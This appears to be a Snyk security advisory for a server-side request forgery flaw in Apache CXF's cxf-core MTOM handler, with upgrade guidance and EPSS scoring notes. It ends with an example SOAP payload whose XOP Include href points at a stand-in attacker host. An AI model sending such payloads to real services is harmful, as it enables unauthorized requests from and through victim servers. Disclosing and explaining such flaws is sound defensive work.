Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.
Start learningUpgrade org.apache.cxf:cxf-core
to version 3.4.10, 3.5.5 or higher.
org.apache.cxf:cxf-core is an an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) as the MTOM
handler allows content injection while parsing the href
attribute of XOP:Include
in MTOM
requests. Exploiting this vulnerability allows an attacker to perform SSRF-style attacks on web services that take at least one parameter of any type.
NOTE
This vulnerability exists when using SOAP
web service or JAXRS
web service with MTOM
enabled.
<stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>